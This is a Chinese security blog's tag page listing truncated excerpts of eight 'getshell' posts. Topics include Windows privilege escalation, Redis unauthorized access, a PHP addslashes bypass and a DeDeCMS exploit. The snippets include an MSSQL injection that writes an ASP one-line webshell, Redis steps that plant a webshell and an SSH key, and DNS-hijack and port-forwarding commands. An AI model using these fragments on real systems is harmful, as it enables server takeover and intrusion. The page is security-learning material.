DYBOY's Blog

标签关键词

关于 getshell 的文章共有8条

网络安全
[MS16-067]提权小记

拿到了一个08Server的网站,同时3389端口打开着,可以直接连接尝试了Meterpreter反弹shell,getsystem但是失败了然后团队成员Si告知下尝试了MS16-075的利用,记录一下在shell中上传potato.exeGithub:https://github.com/SecWiki/windows-kernel-exploit...

网络安全
[渗透实战]某铸造设备公司官网经典思路

这个网站是微信漏洞挖掘公开课群里的一位群友发出来的,空闲时看了看,不是很难,但是我觉得有一定的参考价值,算是比较经典的一种吧!*声明:只做技术分享,后续已去除shell的文件!请相关公司做好及时的修复!看到这篇文章的大佬,也别去折腾了,思路本文已经分享,自重微信群友发来这样的消息:[图片已删除]从这样的消息看出来,已经知道editor编辑器,可以确定发问者已经进入网站的后台...

网络安全
MSSQL备份提权

Myssql备份提权;alterdatabasexxxxsetRECOVERYFULL--;createtablecmd(aimage)--;backuplogxxxxtodisk='d:/web/1.bak'withinit--;insertintocmd(a)values('<%evalrequest(123)%...

网络安全
[渗透测试]Redis未授权访问漏洞利用

偶然发现某大佬博客说了一下Redis的漏洞,便整理了一下笔记,并做了实战测试0x00笔记1.写入webshelldir=绝对路径dbfilename="1.php"2.写入ssh公钥匙本机生成公钥sshssh-keygen-trsa-C"test@test"dir=/root/.ssh/dbfilename=authorized_keys\n...

网络安全
PHP复杂变量绕过addslashes()直接拿shell

很早的时候,渗透吧群里的朋友提出的一个问题,自己也是迷迷糊糊,遂记之如下!0x00示例ctf.php<?php@$_str=$_GET['str'];//print_r($_str);$_temp='$str="'.addslashes($_str).'";';@print_r($_temp);@eval('$st...

网络安全
[笔记]Metasploit内网/局域网劫持

Metasploit内网劫持的笔记内网渗透劫持DNS拿到cmdshell,如下步骤:ifconfig//获取IP及网卡信息leafpad/etc/ettercap/etter.dns//打开文件插入*A记录预设IPserviceapache2start//启动本机apache服务此次不用启动,使用ms10_046会自动启动//*A...

网络安全
[内网渗透]LCX的蒂花之秀

LCX弹个shellLCX端口转发(突破内网不能连接)Webshell执行-slave<ConnectHost><ConnectPort><TransmitHost><TransPort>-slave外网IP外网IP监听端口127.0.0.1远程桌面端口外网(服务器)执行-listen...

网络安全
DeDeCMS友链Getshell

DEDECMS的一个漏洞0x00漏洞详情http://0day5.com/archives/4209/0x01EXP<?php//print_r($_SERVER);$referer=$_SERVER['HTTP_REFERER'];$dede_login=str_replace("friendlink_main.php","",$referer);...

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap